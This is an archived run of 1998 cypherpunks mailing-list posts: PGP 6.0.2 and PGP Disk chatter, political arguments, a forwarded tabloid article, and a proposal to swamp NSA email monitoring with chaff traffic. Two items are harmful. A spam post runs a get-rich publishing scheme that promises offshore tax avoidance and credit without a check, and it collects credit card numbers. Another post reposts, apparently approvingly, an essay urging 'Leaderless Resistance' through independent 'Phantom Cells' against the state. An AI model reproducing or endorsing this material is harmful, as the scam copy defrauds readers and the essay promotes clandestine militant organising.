To: cypherpunks@EINSTEIN.ssz.com
Subject: RE: Nitwits
Message-ID: <27b167df8676b4b47cc5d0122e7e3589@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>Sites like AOL and Hotmail do a great service to the net: They hurd the
>unilluminati onto a select few sites, making it easier to blackhole them en
>masse.

This is what happens when you read literature on GNU Hurd while you're
posting.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gabby12235@aol.com
Date: Thu, 17 Dec 1998 18:28:11 +0800
Subject: Publishing Company For Sale!!!
Message-ID: <92620059.3678ca40@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



See information about Free Credit Application Below!

My Multi-Million Dollar 
Publishing Company 
ONLY $149

Free Pre-Approved Merchant Account Application with Order!! 
To Start Your Business Out Right!!

If you ever wanted "the easy way out" to make a lot of money
with a business of your own....
Here is the EASIEST WAY TO START!

I'm writing this letter to let you in on something that'll blow
you away. What I'm about to present is something I've 
never done before...something that I'll never do again....
So PAY ATTENTION!

For the past few years...I've have been running ads in 
newspapers & magazines, by direct mail, and throughout 
the internet.  These ads were always small and very cheap...

On these ads, we have been selling little manuals.  These 
manuals have sold for anywhere between $10 to $99 each.  
We always ran different ads for each manual we were selling.  

I like selling information because NOBODY can put a price on 
it...ESPECIALLY when it is your own...The Sky is the Limit!

Plus it is very cheap to reproduce How-To manuals.  It costs 
between 40 cents and $3 to print the entire print manuals and 
around 35 cents to copy the manuals on disk.  AND you can 
sell them for up to $99 each.   That is one hell of a markup!

These manuals tell you how to get a car with no money down 
and no credit...another one tells you how to avoid taxes by 
depositing income offshore...now you may not be interested in 
saving money by going offshore...but believe me....there are 
MILLIONS OF PEOPLE WHO DO...and they are willing to pay 
me to teach them!!! 

Well this is where the unbelievable offer comes in...I hope you
are sitting down for this one...because this is a once in a 
lifetime chance for you.  I do not know of an easier way to 
become financially independent...In fact THERE IS NO EASIER WAY!!! 
The next few paragraphs will reveal everything to you.

I am willing to sell you my entire informational product line 
with FULL REPRINT RIGHTS and complete step-by-step 
instructions on how to start your mail order information business 
with very little money. 

Remember, these are PROVEN WINNERS.  If you are 
stumped on something to sell or if you are having trouble 
writing a good ad, I have also included an entire book on 
disk to help you produce KILLER ads!

This entire package which I call a Publishing Company in a 
Box will come on 1 CD containing over 2000 'Hot-Selling' 
Books, Reports And Manuals ready to print and sell, Sell, 
SELL! It also will come with a signed letter giving YOU FULL 
REPRINT RIGHTS allowing you to sell them for as much as 
you want and however you want.  You Can even sell the entire
kit to someone else to resale on their own!  You also receive 
copies of KILLER ads which can fill your mailbox with cash!

I am not even going to ask you for any of the money either...
What you make is yours to keep .  In fact...you get to make a 
ton of money on these manuals for as long as you wish...and 
you will never have to pay me another red cent in royalties!

I am even going to print out and prepare our #1 selling report 
which contains the secrets of obtaining credit without a credit
check and producing an offshore income without taxes so that 
you will be able to take it down to your local copy shop and be 
ready to sell it the same day you have received it. Watch out 
though - one individual is making $70,000 a month on this 
report alone!  (Why - Because you can include a FREE offshore 
credit application for those with bad or no credit with this 
report and explode your mailbox with orders) Note: THIS 
APPLICATION IS INCLUDED!

All I ask for is...$149 and I will include FREE Priority Mail 
Shipping!  Yes, I said $149.  There are no zeros missing.  
Plus if you order before the New Year, Jan. 1, 1999 I will 
include 4 extra special bonuses...

Bonus #1 - "Search Engine Magic" on disk.  This report will 
shoot your web site up to the top of the search engine listings.
Other web advertisers are selling this manual for $99 by 
itself - But I will give it to you for FREE with this package.

Bonus #2 - The report "How to Make at least $1,600 a week 
online...Starting Now!" which is taking the internet by storm 
will be included absolutely FREE! 

Bonus #3 - I will include special details about a secret source
for direct mail leads that can produce cash orders along with 
out KILLER ads.  And another source will be given which 
allows you to advertise nationwide through newspapers to 
70,000,000 readers for as low as 7 cents per word.

Bonus #4 - I also will include a pre-approved application for 
a merchant account for your business benefit.  Taking credit 
cards will increase your business up to 100%.  The normal 
$195 application fee will be waved with this pre-approved 
application.  

But there is one drawback... I am sending this ad to 10,000 
other people...and I will only allow 50 kits to be sold.  It 
wouldn't make much sense if I sold this kit to 1,000 or 2,000 
people...The market would be saturated with these same manuals... 
and I don't want to do that.  To make sure that the people in 
this offer get the same results I have...ONLY 50 people can 
have it for $149.00!

Chances are, I will get all 50 within a week's time.  So if this 
is something you are interested in...RUSH me a check or money
order for $149.00 TODAY to insure your future business.

But, even if you decide to pass this up...Don't sweat it.  It's
not like I am going to be mad or anything like that.  I know I 
will get my 50 order limit really fast.  And anyone who gets 
their check into me late... I will simply send it back.

For only $149.00, I am going to let you have the easiest money you 
will ever make.  The manuals are written, the ads are presented, the 
advertising plan is laid out, and all you have to do is print them out 
for pennies and place the ads.

Do it today! Rush me your payment of $149.00 right now...and 
get your very own MILLION DOLLAR publishing company going!

You can start with one or two manuals...even the day you 
receive the package...and then expand to include ALL of them!

For $149.00, you have everything you need to make a killing 
with your very own business.  If you want to make real 
money - then this offer is for you!

"I took the report "Search Engine Magic" and sold over 50 
copies on disk within 2 weeks! They sold for $99 and I was 
able to copy them for under 50 cents each.  Wait till I start 
marketing the other products included in this line!!!"
Joe Fisher - Internet Marketer

To rush order this "MILLION DOLLAR Publishing Company in 
a Box" simply fill out the order form below and fax it to our 24 
hour  order line at:

FAX ORDER LINE:
1 (212) 504-8032

Regular Mail to:
Financial Systems
P.O. Box 301
Orange, Ma 01364

ORDER FORM
--------------------------------------------------------------
Please send to:

Your Name__________________________________________
 
Your Address________________________________________
 
Your City____________________________________________
 
State / Zip___________________________________________
 
Phone #: ____________________________________________
(For problems with your order only. No salesmen will call.)
 
Email Address_______________________________________

We Accept Checks or Money Orders along with all Major Credit Cards 
including Visa, MasterCard and American Express.  (NOTE - We only 
ship to the address listed on the credit card)

(Please Fill Out Below Section and Make sure that the above name 
and address are listed as it appears on the card) for $149.00

Credit Card Number:________________________________

Expiration Date:___________________________

Signature:_________________________

Date:____________________

[  ] YES! Please rush my Publishing Company in a Box.  I 
understand I have FULL REPRINT Rights and can sell any of 
the items for whatever price I desire, even the entire kit.

[  ] DOUBLE YES!  I am order before the New Year, Jan. 1, 1999!  
Please include the extra special bonuses!

* Please check one of the following payment options:
[  ] I am faxing a check (Do not send original, we will make a 
draft from the faxed check)

[  ] I am faxing my credit card number. (Note your card will be 
charged for $149.00 and we only ship to the address on the card)

[  ] I am enclosing a check or money order for $149.00!

Note - If ordering outside continental US, please add $5 to S&H

P.S. Don't forget you will receive 2,000 Manuals, Books, and 
Reports (Some of which are up to 200 pages each)...all for 
$149...You have full reprint and resale rights to make as much 
money as you want without ever paying any royalties whatsoever!


* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
You have been carefully selected to receive the following as 
a person obviously interested in this subject based upon your 
previous internet postings, or visits to one of our affiliate 
web sites. If you have received this message in error, reply 
with the word unsubscribe in the subject.
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 17 Dec 1998 19:08:45 +0800
To: "'Joel O'Connor'" <cypherpunks@cyberpass.net
Subject: RE: I must admit. . .
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F863E@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



Someone claiming to be Joel O'Connor wrote:

> It only took one to turn India around.  Ghandi nearly 
> starved to death, used nothing but passifism and won
>  the race man.  

I'm sorry but this is nonsense. Ghandi may have been a great man and an
inspiration to us all but he *lost*. His first big political involvment was
trying to stop the British from allowing the Boers to take away political
rights from the "coloured" and Asian  population of Cape Colony. The Brits
caved into the white South Africans and we all know what happened next.
Then he tried to get them (well us I suppose, since I'm British) to "quit
India" in the 1920s & 30s - failed again, we got out 2 decades later, after
WW2,  when a British government was elected that was anti-colonialist. You
wouldn't have been able to persuade the 1945-1951 government to stay *in*
India. In fact they were so eager to get out they probably caused more
problems by the speed of the withdrawal.  Ghandi wanted a secular federation
of all India - but instead there was partition, the secession of an
inherently unviable Muslim state that was bound to end up with either civil
war or fundamentalism (and in the end got both, at least for some of the
time), and at least hundreds of thousands, and possibly many millions of
deaths that could have been avoided.  And then of course he himself was
killed.  And now India has the BJP.  Ghandi was perhaps *right* but he
certainly didn't "win the race".

Ken (and not his employers)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: report@top-10.com
Date: Thu, 17 Dec 1998 18:42:00 +0800
To: cypherpunks@toad.com
Subject: Visibility Report
Message-ID: <199812170944.EAA32104@storm.rorap.com>
MIME-Version: 1.0
Content-Type: text/plain




Content-Type: TEXT/PLAIN; charset=US-ASCII
Your report was prepared using the search engines listed below.
The term used for each search is listed at the beginning of the
report block for that term.  The #'s beside each search engine
represent the position in which that engine reported your web site.
Your web site's URL:  (http://www.jungle.com/michael/culture/books/bookshelf.html)
This report was generated on 12/16/1998.


Search Terms: Propaganda and Political Art New Jersey
-----------------------------------
  9 -- Yahoo!
  0 -- Excite
  0 -- AOL NetFind
  0 -- Lycos
  0 -- InfoSeek
  0 -- Northern Light
  0 -- Planet Search
  0 -- AltaVista
  0 -- Netscape NetFind
  0 -- Web Crawler

This report only reports positioning within about the top 30
listings.  A listing further down is not of much use as most users
will only view results from the top 10 to 20 positions.  Remember
that you can always request another report, for any web site, for
any search term, from our site, and it's always free.
A complete expliation of this report is available at:
http://www.top-10.com, and click on the "resources" link.
====================================================================
Thanks for using our report.  It is available to you at any time
for no charge.
			TOP 10 PROMOTIONS
		      http://www.top-10.com
               "WE'LL GET YOUR BUSINESS TO THE TOP"
             252-537-9222 (phone) -- 252-537-3125 (fax)
====================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Thu, 17 Dec 1998 23:20:56 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Throwing Sand into the All-Seeing Eye (further ideas)
Message-ID: <3.0.3.32.19981217144631.006d1ae4@209.204.247.83>
MIME-Version: 1.0
Content-Type: text/plain



Snipped some musings about throwing the NSA a lot of worthless bones to
chew on...

>We could rotate the tags around, but if we send too many of these, they can
>throw you into the above category.
>
>You could post them anonymously, which makes it much harder for them catalog,
>so they will be forced to look at the traffic, when and if, they need to
search
>it.
>
>You could have some program randomly alter your email address, but patterns
>would be found to filter you out that way.
>
>We could also use remailers to create lots of cover traffic going to
>/dev/null.  This would be far more interesting, especially if we add some
sort
>of poetry writer that spits out spook talk and update it occasionally with
>current event keywords.  Then again, they could filter the messages that
go to
>/dev/null, or find patterns in the spook poetry generators...  
>

Now how about instead of dev/null you periodically create free e-mail
accounts at hotmail, juno, etc, and send the mail to these "real"
addresses. That should give them a little more work at sorting through the
chaff. I f there were say 5,000 accounts on each of the top ten free mail
sites receiving say 500 chaff letters every day for a month before
switching to new account names that would amount to about 25,000,000 mails
per day on accounts that would just disappear after awhile. Anyone know how
many anonymous remailers there are? I wonder if these bots could be thrown
in to help generate the cover traffic to boost anonymity with out sucking
up all the available bandwidth. 

It would seem that this would help address two problems. The problem of
insufficient cover traffic on the anonymous remailers and the issue of
keeping the jerks at the NSA so busy sniffing up junk that they become less
effective at snooping on legitimate communications.

Certainly the load of 5,000 bogus accounts on hotmail, which has reportedly
in excess of 20 million accounts, would be minimal.

I think the biggest issue is whether or not there are sufficient resources
to generate this volume of mail through a wide enough re-mailer base to
thwart filtering without identifying any particular group of people as the
originators of the letters.

I think a long term surge of 25 million letters per day which meet their
snoop standards would have to create some kind of a bogging effect on their
capacities. I don't know what the real numbers are but it might be
interesting if say 50 million or fewer total e-mails per day are "captured"
for storage by the spooks on a normal day. At that level a surge of 25
million per day would be a 50% increase for handling. What would be the
response of the NSA?

Some will say that it would be no big deal for the NSA since they could
just add more hardware. But I think that any time we can make the haystack
significantly bigger that should theoretically make the needle harder to
find. And since Cpunks aren't criminals we certainly wouldn't be creating
more needles!

APF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Fri, 18 Dec 1998 08:06:33 +0800
To: Walter Burton <cypherpunks@cyberpass.net
Subject: RE: PGP Disk for free??
In-Reply-To: <013D438ED22ED2119F630060082F763C0DD608@kenny.pipestream.com>
Message-ID: <v0410390ab29f4143f682@[130.248.15.54]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:20 PM -0500 12/17/98, Walter Burton wrote:
> 
> The source for 5.x is freely available, and I expect the source for (at
> least the free versions of) 6.x will soon be.  Now, as far as I'm aware,
> the source for PGP Disk is not yet available, and probably won't be,
> since that's a commercial product.  Not that that's a GOOD reason ;).

Go to <http://www.pibooks.com>, and search for PGP.
You can buy the printed source code for PGP 6, including PGP Disk.
-- Marshall

Marshall Clow     Adobe Systems   <mailto:mclow@mailhost2.csusm.edu>

Freedom isn't being able to do what you like, it's allowing someone else
to do or say something you hate and supporting their right to do so.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Holland <ekkensj@earthlink.net>
Date: Fri, 18 Dec 1998 08:42:13 +0800
To: cypherpunks@toad.com
Subject: Re: McAfee PGP 6.0.2
In-Reply-To: <199812171941.UAA02032@replay.com>
Message-ID: <3.0.5.32.19981217154338.00939630@mail.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain



>McAfee has announced that they are giving away the commercial version of
PGP 6.0.2 for free for a limited time.

Where is the free version available?  Neither the McAfee or Network
Associates web sites mentioned this.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Walter Burton <wburton@pipestream.com>
Date: Fri, 18 Dec 1998 06:33:18 +0800
To: cypherpunks@toad.com
Subject: RE: PGP Disk for free??
Message-ID: <013D438ED22ED2119F630060082F763C0DD608@kenny.pipestream.com>
MIME-Version: 1.0
Content-Type: text/plain



> -----Original Message-----
> From: Anonymous [mailto:nobody@replay.com]
> Sent: Thursday, December 17, 1998 2:42 PM
> To: cypherpunks@toad.com
> Subject: 
> 
> 
> McAfee has announced that they are giving away the commercial 
> version of PGP 6.0.2 for free for a limited time.  It also 
> includes PGP Disk, which creates virtual encrypted drives.  
> PGP 6.0.2 also claims to have anti-TEMPEST protection, by 
> using a special font.  My question is: what's the catch?

They feel guilty 'cause there was a flaw in previous versions of PGP
Disk.  It's a gesture of good will.

> It is a fact that Network Associates (McAfee's owner) is a 
> member of the Key Recovery Aliance.  Is the decision to give 
> the software away part of something that's not being said 
> (i.e. reduced security) 

The source for 5.x is freely available, and I expect the source for (at
least the free versions of) 6.x will soon be.  Now, as far as I'm aware,
the source for PGP Disk is not yet available, and probably won't be,
since that's a commercial product.  Not that that's a GOOD reason ;).

> or did I spend $39.99 on PGP and an 
> additional $39.99 on PGP Disk for no reason because it would 
> become available for free two weeks later?

Bingo.  Perhaps they'll give you a refund!

> And, has anyone tested the anti-TEMPEST features in PGP 6.0.2?

Not I.  That would take some serious equipment!  I doubt even Phil
Zimmerman or Network Associates has tested it thoroughly.  Throughout
the online help regarding the Secure Viewer and Tempest attacks, they
use phrases like "MAY reduce levels of radio frequency emissions" and
"MAY make it harder for the signals to be remotely detected" (my
emphasis).

---
Walter S. Burton <mailto:wburton@pipestream.com>
For my PGP public key, send a message with the subject "get public key."
Fingerprint: 3E28 7C81 536C 92FE ED01  6B70 0E37 DB49 9F6C 8DF8




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 18 Dec 1998 09:28:32 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: Comrade Klinton at it again
Message-ID: <3679A712.25C4@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Don't you mean "Iraqui" Embassy?

Or is this thing spreading? I hope not.

Comrade Klinton is no worse than Comrades Hyde, Ingliss, Gingrich,
Coble, Bono, well you know the rest. They all call themselves statesmen
but they are pretty damned pedestrian.

****************

Comrade Klinton just started another bombing run, curiously after it
became
widely known that the impeachment hearings wouldn't be delayed until
next
week. So far, every target hit has been in camera range. NBC said that
the
Iranian Embassy might have been hit by a Tomahawk.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pallas Anonymous Remailer <athena@cyberpass.net>
Date: Fri, 18 Dec 1998 10:23:59 +0800
To: cypherpunks@cyberpass.net
Subject: bears repeating, part 2
Message-ID: <b866346c384c1b913d357caccbc3670b@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



another try:

An alternative to the pyramid form of organization is the cell system. In the past, many political
groups (both left and right) have used the cell system to further their objectives. Two examples will
suffice. During the American Revolution, "committees of correspondence" were formed throughout
the Thirteen Colonies. Their purpose was to subvert the government and thereby aid the cause of
independence. The "Sons of Liberty," who made a name for themselves by dumping government
taxed tea into the harbor at Boston, were the action arm of the committees of correspondence. Each
committee was a secret cell that operated totally independently of the other cells. Information on the
government was passed from committee to committee, from colony to colony, and then acted upon
on a local basis. Yet even in those bygone days of poor communication, of weeks to months for a
letter to be delivered, the committees, without any central direction whatsoever, were remarkably
similar in tactics employed to resist government tyranny. It was, as the first American Patriots knew,
totally unnecessary for anyone to give an order for anything. Information was made available to each
committee, and each committee acted as it saw fit.

A recent example of the cell system taken from the left wing of politics are the Communists. The
Communists, in order to get around the obvious problems involved in pyramidal organization,
developed to an art the cell system. They had numerous independent cells which operated completely
isolated from one another and particularly with no knowledge of each other, but were orchestrated
together by a central headquarters. For instance, during WWII, in Washington, it is known that there
were at least six secret Communist cells operating at high levels in the United States government (plus
all the open Communists who were protected and promoted by President Roosevelt), however, only
one of the cells was rooted out and destroyed. How many more actually were operating, no one can
say for sure.

The Communist cells which operated in the U.S. until late 1991 under Soviet control could have at
their command a leader who held a social position which appeared to be very lowly. He could be,
for example, a busboy in a restaurant, but in reality a colonel or a general in the Soviet Secret
Service, the KGB. Under him could be a number of cells, and a person active in one cell would
almost never have knowledge of individuals who were active in other cells; in fact, the members of
the other cells would be supporting that cell which was under attack and ordinarily would lend very
strong support to it in many ways. This is at least part of the reason, no doubt, that whenever in the
past Communists were attacked in this country, support for them sprang up in many unexpected
places.

The effective and efficient operation of a cell system after the Communist model is, of course,
dependent upon central direction, which means impressive organization, funding from the top, and
outside support, all of which the Communists had. Obviously, American patriots have none of these
things at the top or anywhere else, and so an effective cell organization based upon the Soviet system
of operation is impossible.

Two things become clear from the above discussion. First, that the pyramid form of organization can
be penetrated quite easily and it thus is not a sound method of organization in situations where the
government has the resources and desire to penetrate the structure, which is the situation in this
country. Secondly, that the normal qualifications for the cell structure based upon the Red model
does not exist in the U.S. for patriots. This understood, the question arises "What method is left for
those resisting state tyranny?"

The answer comes from Col. Amoss who proposed the "Phantom Cell" mode of organization which
he described as Leaderless Resistance. A system of organization that is based upon the cell
organization, but does not have any central control or direction, that is in fact almost identical to the
methods used by the committees of correspondence during the American Revolution. Utilizing the
Leaderless Resistance concept, all individuals and groups operate independently of each other, and
never report to a central head-quarters or single leader for direction or instruction, as would those
who belong to a typical pyramid organization.

At first glance, such a form of organization seems unrealistic, primarily because there appears to be
no organization. The natural question thus arises as to how are the "Phantom Cells" and individuals to
cooperate with each other when there is no inter-communication or central direction? The answer to
this question is that participants in a program of leaderless resistance through "Phantom Cell" or
individual action must know exactly what they are doing and how to do it. It becomes the
responsibility of the individual to acquire the necessary skills and information as to what is to be done.
This is by no means as impractical as it appears, because it is certainly true that in any movement all
persons involved have the same general outlook, are acquainted with the same philosophy, and
generally react to given situations in similar ways. The previous history of the committees of
correspondence during the American Revolution shows this to be true.

Since the entire purpose of leaderless resistance is to defeat state tyranny (at least in so far as this
essay is concerned), all members of phantom cells or individuals will tend to react to objective events
in the same way through usual tactics of resistance. Organs of information distribution such as
newspapers, leaflets, computers, etc., which are widely available to all, keep each person informed
of events, allowing for a planned response that will take many variations. No one need issue an order
to anyone. Those idealists truly committed to the cause of freedom will act when they feel the time is
ripe, or will take their cue from others who precede them. While it is true that much could be said
against this kind of structure as a method of resistance, it must be kept in mind that leaderless
resistance is a child of necessity. The alternatives to it have been shown to be unworkable or
impractical. Leaderless resistance has worked before in the American Revolution, and if the truly
committed put it to use themselves, it will work now.

#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Fri, 18 Dec 1998 02:28:01 +0800
To: cypherpunks@cyberpass.net
Subject: XS4ALL
Message-ID: <199812171734.SAA24745@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




It seems that XS4ALL has been bought by KPN (The Dutch Telco)

-aj-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harvey Rook (Exchange)" <hrook@exchange.microsoft.com>
Date: Fri, 18 Dec 1998 11:21:58 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: RE: "They've started bombing Mars! I repeat, they're bombing Mars!"
Message-ID: <2FBF98FC7852CF11912A0000000000010D19ADE1@DINO>
MIME-Version: 1.0
Content-Type: text/plain



The scene from Babylon 5 is hardly original. The same thing happened in
Vietnam, The Korean War, WW2, WW1....

This is war, and in war innocent people die to further the cause of the
leaders. You just have to hope and pray that some good will come out of it.

Harv.

> -----Original Message-----
> From: Anonymous [mailto:nobody@remailer.ch]
> 
> "We just intercepted a coded transmission from Earth Force 
> Command. They've
> started bombing Mars! I repeat, they're bombing Mars!"
> 
> (scene of two fighters on approach to a biodome)
> 
> Omega One: "Standing by. Weapons hot."
> Radio: "Don't do it! We have women and children down here! 
> Don't do it!"
> Radio2: "Omega One, you are clear for drop."
> 
> (weapons fly, killing a few thousand innocent men, women, and 
> children.)
> 
> It amazes me how much similarity Babylon 5 has to reality. Is 
> Clinton a fan
> who fancies himself as President Clark? I'm starting to worry.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Helm <helm@fionn.es.net>
Date: Fri, 18 Dec 1998 11:23:10 +0800
Subject: Re: McAfee PGP 6.0.2
In-Reply-To: <Pine.LNX.4.05.9812181007350.7783-100000@khercs.chipware.net>
Message-ID: <199812180248.SAA17913@fionn.es.net>
MIME-Version: 1.0
Content-Type: text/plain



Max Inux writes:
> it goto the pgp pages (easy link -> www.pgp.com) download PGP For personal
> privacy, it is under that link.

I think you're going  to be disappointed if you go there;
the pgp web page has been swallowed by nai's, & download
leads you to the new McAfee store, which is surely a nominee
for "web pages that suck"(tm).  No free downloads.  There may 
be something under one of the evaluation pages, but frankly
the whole site turned me off & I didn't care to look so.  It's hard
to find any mention of pgp at all, actually.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 18 Dec 1998 11:54:12 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Comrade Klinton at it again
Message-ID: <3679C4D9.C2E1596@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Somebody said:
> As I recall, the name "Desert Fox" was a nickname held by a Nazi general.
> Fitting, that.

Fitting?  I find the occasional anti-American hyperbole around here
rather depressing.  I'm reminded of 30-year-old engineers talking
about the depression of the 80's!  If you don't see the difference
between the US and Nazi Germany, you need to do a lot more reading.
While the anti-privacy activities of the administration and law
enforcement are threatening and need to be resisted, they are by no
means on a par with the excesses of the Nazi leadership.

In any case, Gen. Erwin Rommel (the Desert Fox) was never a Nazi.

-- 
	Jim Gillogly
	Trewesday, 28 Foreyule S.R. 1998, 02:48
	12.19.5.14.0, 6 Ahau 13 Mac, First Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 18 Dec 1998 12:39:49 +0800
To: cypherpunks@cyberpass.net
Subject: [CTRL] Polygamous Paradise!
Message-ID: <199812180318.TAA03816@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Lyn McCloskey <MCCLOSL@TOWERS.COM>
Subject: [CTRL] Polygamous Paradise!
Date: Fri, 11 Dec 1998 12:35:12 -0500
To: CTRL@LISTSERV.AOL.COM

 -Caveat Lector-

Take a number...

http://www.tabloid.net/1998/12/09/island_981209.html

NEW UTOPIA RISES FROM THE SEA
'Prince' Lazarus Promises to Save Citizens from Death, Taxes

MATT WELCH reports

[Dec. 9, 1998] -- Don't worry, people: Despite delays caused by Hurricane
Mitch, New Utopia will still rise from the waters of the sea in time to
beat the millennial apocalypse.

Lazarus Long, a wealthy 67-year-old Oklahoman whose name was Howard Turney
until three years ago, says his longtime dream of constructing a
libertarian island paradise on top of three shallow Caribbean reefs has
been only slightly postponed by the hurricane's effects on New Utopia's
neighbors.

"We were in the process of negotiating a trade treaty with the Honduran
government officials," New Utopia Information Officer Grace Caswell wrote
on the island's website. "Prince Lazarus had gone to Washington to meet
with the Honduran ambassador to the U.S. He, in turn, was to present it to
President Flores on November 1st. That is the day that the hurricane
'Mitch' struck their country."

"Honduras claims a 200-mile exclusive economic zone, so without recognition
of New Utopia as a sovereign nation we can't begin construction without
risk of being annexed by Honduras at some future date."

If it sounds like these people are talking about building their own country
on a fake island in the sea -- well, that's because they are.

Once an agreement with Honduras is reached, the founders say, the reefs
will be fitted with steel girders and gigantic platforms of pre-fabricated
concrete. Construction of air and sea ports will commence, followed by
housing, a university, an anti-aging clinic, offshore banks and a casino.
Citizens will live in a tax-free constitutional monarchy not too far off
the coasts of Mexico and Honduras. Marijuana will be legal and polygamy
tolerated.

The Ageless Sovereign

His Royal Highness Prince Lazarus Long wants it known that he is not
joking. As Howard Turney, he had a long and successful career as a maverick
businessman after initial stints as a cowboy and soldier. He was in the
restaurant biz, marketed groceries, farmed shrimp and sold used generators,
before having his life changed by the human growth hormone, London's
Independent reported.

In 1990, at the age of 59, Turney was a badly aging mess, with a 44-inch
waist and shaky hands, the paper reported. After reading a report about the
magic of the then-illegal human growth hormone, Long got a connection in
Monterey, Mexico and began mainlining the stuff. Now, without exercising
seriously, he's lost the shakes, has rock-hard muscles and a 32-inch waist,
the paper said.

"I'm 66 going on 40," he told the Independent. "And I've not had any
negative side effects at all."

Moved, Turney founded a network of anti-aging clinics administering the
wonder drug, and made a bundle. It was then that he really began
identifying with one of the signature heroes of the novels of libertarian
sci-fi scribbler Robert A. Heinlein -- Lazarus Long.

In "Methuselah's Children," and especially "Time Enough for Love,"
Heinlein's Long holds forth as an ageless man of wisdom and sex, hurtling
through the centuries with fabulous naked babes on his arm, and dispensing
philosophical tidbits with wit and humor. At age 64, Howard Turney became
Lazarus Long; soon after he declared himself prince of the New Utopia.

As a dispenser of his own wisdom, Long echoes many modern-day followers of
objectivist Ayn Rand when they try to talk about foreign affairs:

"The United States used to prosper because it was relatively free in an
unfree world," he writes on the website. "Now, without changing much
itself, the U.S. is relatively unfree in a much freer world. This creates a
competitive condition, which tends to favor an enclave like Hong Kong,
which practices true free market capitalism, rather than a welfare state
like the U.S., which is committed to burdensome taxes, which penalize
success."

Long tries his hand at a sort of poetry:

"Excellence can be attained if you care more than others think is wise
Risk more than others think is safe
Dream more than others think is practical
Expect more than others think is possible."

A Tropical Venice

New Utopia already has a constitution, a board of governors and more than
500 citizens, the website says. Prospective residents need only to buy a
$1,500 five-year bond, payable at 9.5% compound annual interest. The
projected price tag on creating an island where there is now only water is
$216 billion, which will be financed by Long, citizens, prospective
businesses and old-fashioned real estate developers.

Offshore finance, tourism, medicine and education are targeted as the main
sectors of New Utopia's economy, and Long plans on building a stimulating
environment for the super-citizens.

Utopians will enjoy "classical architecture, immaculate public parks, a
comparable governing body, and a stable political structure, with the same
freedom from crime and taxation," the site says. "Resident citizens and
visitors will experience it more as a tropical 'Venice,' complete with
waterways and gondolas."

Free from messy bureaucracy like property taxes, welfare rolls and industry
regulation, residents will serve as guinea pigs for the newest drugs and
surgical techniques.

"There are things on the horizon that people today can only dream about,"
Long told the Independent. "We are not that far from being able to live
multiples of what we look at now as the maximum lifespan. ... [There are]
things I can't tell you about because they were told me in confidence. ...
Tests and studies are going on. ... Turn your tape recorder off."

For now, New Utopia planners will continue processing immigration requests
from their office in East Tulsa, Oklahoma. The first concrete platform is
now scheduled for January, though the date has now been pushed back at
least six different times. And the pesky Hondurans, currently distracted by
the brutal wreckage of Hurricane Mitch, still need to recognize New
Utopia's sovereignty.

Still, "We are steadfast in our date of December 1, 1999 as the celebration
of our birth as a nation. Even if all the desired infrastructure is not in
place, it will be in the construction phase, the airport will be finished
and the government will be in office."
-----------------
Get in line at the official website:  http://www.new-utopia.com/

DECLARATION & DISCLAIMER
==========
CTRL is a discussion and informational exchange list. Proselyzting propagandic
screeds are not allowed. Substance-not soapboxing!  These are sordid matters
and 'conspiracy theory', with its many half-truths, misdirections and outright
frauds is used politically  by different groups with major and minor effects
spread throughout the spectrum of time and thought. That being said, CTRL
gives no endorsement to the validity of posts, and always suggests to readers;
be wary of what you read. CTRL gives no credeence to Holocaust denial and
nazi's need not apply.

Let us please be civil and as always, Caveat Lector.

========================================================================
To subscribe to Conspiracy Theory Research List[CTRL] send email:
SUBSCRIBE CTRL [to:] LISTSERV@LISTSERV.AOL.COM

To UNsubscribe to Conspiracy Theory Research List[CTRL] send email:
SIGNOFF CTRL [to:] LISTSERV@LISTSERV.AOL.COM

Om




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 18 Dec 1998 12:39:38 +0800
To: cypherpunks@cyberpass.net
